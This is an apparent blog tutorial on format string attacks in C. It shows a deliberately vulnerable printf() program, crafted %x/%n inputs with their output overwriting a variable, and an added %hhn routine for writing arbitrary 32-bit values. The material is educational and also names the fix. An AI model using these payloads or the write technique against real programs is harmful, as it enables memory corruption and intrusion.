www.main.lv
Don't think just code it

2009-12-25 Linux Format String Attack 1

A format string attack targets C functions that take a printf()-style format string. The classic one is printf(), but the whole family (fprintf(), sprintf(), snprintf(), syslog() and friends) behaves the same way when user input reaches the format argument. C code that misuses printf():
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main( int argc, char **argv )
{
	static int i = 0;          /* static: lives in .data at a fixed address in this non-PIE 32-bit build */
	char text[1000];
	if (argc < 2)
		return 1;
	/* bounded copy: the original strcpy() would also overflow text[] on long input */
	strncpy(text, argv[1], sizeof text - 1);
	text[sizeof text - 1] = '\0';
	printf("%.8x\n", (unsigned)(uintptr_t)&i);   /* address of i, printed as 32-bit hex */
	printf("No way it never will works because value of i=%d\n",i);
	printf( text );   /* the bug: user input used as the format string */
	printf("\nValue of i=%d\n",i);
	return 0;
} 
The first printf() prints the address of the static i. The program then prints the value of i, calls printf() with the program's first argument as the format string, and prints i again so we can see whether it changed.

Run:
./e1 'Halolo'
Output:
08049674
No way it never will works because value of i=0
Halolo
Value of i=0


Run:
./e1 'Halolo%s'
Output:
08049674
No way it never will works because value of i=0
Halolo(null)
Value of i=0 

Run:
./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674
No way it never will works because value of i=0
t?_0
Value of i=0

The "t?" is the four address bytes 74 96 04 08 printed raw (only "t" is printable), and %x printed 0, the first stack slot above the format string, since no real argument was passed. %n is the interesting conversion: it writes the number of characters printed so far into the int that the matching argument points to. Try it:

Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674
No way it never will works because value of i=0
Segmentation fault

The %x consumed the first stack slot (0) and %n used the second one (8) as a pointer, so the write faults. Walking further up the stack with more %x conversions, the sixth slot is the start of text[], which is the address of i we put there:

Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16

16 is exactly the number of characters printed before %n fired: 4 address bytes plus "_0_8_40_4_4_" (12 characters). Padding one of the %x conversions with a field width inflates that count:
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216

The width on the fifth %x pads it to 1201 characters, so when %n fires the count is 14 + 1201 + 1 = 1216. By choosing the width you can write almost any value into i. Writing a full 32-bit value such as an address this way would mean printing billions of characters, so in practice it is done in several writes, one byte at a time with %hhn, so that each write only needs a count under 256 modulo the wrap-around. Two caveats: the number of stack slots to walk (six here) and the address of i depend on the compiler, the flags and this being a non-PIE 32-bit build; on a current system PIE/ASLR, the _FORTIFY_SOURCE check on %n and gcc's -Wformat-security warning all get in the way. The fix is never to pass user input as the format string: give printf() a fixed "%s" format and pass the text as its argument.
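The byte-wise write mentioned above, as an added example that is not part of the original post: a function that writes a chosen 32-bit value into a target int with a single format string built only from field widths and %hhn conversions. It generalizes the page's single %.1201x/%n write to an arbitrary 32-bit value. The four destination pointers are passed as ordinary arguments here instead of being read off the stack, so the code runs on 32- and 64-bit Linux alike and isolates the width arithmetic; the function name, the sink buffer and the sample value 0xdeadbeef are my choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example: write the 32-bit value `want` into *target with a single
 * format string that contains only field widths and %hhn conversions.
 *
 * %hhn stores the low byte of the running character count, so for each
 * target byte the width is chosen so that (count so far + width) mod 256
 * equals the byte we want. The count only ever grows; a byte that is "behind"
 * the current count is reached by wrapping around once more.
 *
 * The four destination pointers are passed as ordinary arguments. In a real
 * attack they sit in the attacker's input and the vulnerable printf() pulls
 * them from the stack, exactly like the 0x08049674 at the start of text[].
 * Returns the total number of characters the format produced.
 */
int format_write_u32(uint32_t *target, uint32_t want)
{
    signed char *p = (signed char *)target;  /* %hhn expects a signed char * */
    unsigned char wanted[4];                 /* target bytes in memory order, endian-agnostic */
    int width[4];
    unsigned count = 0;                      /* characters emitted before each %hhn */

    memcpy(wanted, &want, sizeof wanted);
    for (int b = 0; b < 4; b++) {
        unsigned w = (wanted[b] - count) & 0xffu;  /* distance to the next matching low byte */
        if (w == 0)
            w = 256;                               /* %*c emits at least one character */
        width[b] = (int)w;
        count += w;
    }

    /* Sink for the padding: four widths of at most 256 each, so 1024 bytes
       plus the terminator fit. The format is a string literal, which keeps
       glibc's _FORTIFY_SOURCE "%n in writable segment" check quiet. */
    char sink[1100];
    return snprintf(sink, sizeof sink, "%*c%hhn%*c%hhn%*c%hhn%*c%hhn",
                    width[0], 'A', p + 0,
                    width[1], 'A', p + 1,
                    width[2], 'A', p + 2,
                    width[3], 'A', p + 3);
}

/* Stand-alone demo: target starts as all ones so every byte must be rewritten. */
int main(void)
{
    uint32_t target = 0xffffffffu;
    int n = format_write_u32(&target, 0xdeadbeefu);
    printf("wrote 0x%08x using %d characters of output\n", target, n);
    return target == 0xdeadbeefu ? 0 : 1;
}
```

Build it with a plain `cc -o fw fw.c`; no -m32 is needed because nothing here depends on the stack layout. The same width arithmetic is what an exploit string uses, with the four pointers embedded in the input and enough %x (or %c) conversions in front to reach them, as the six-slot walk above shows for this binary.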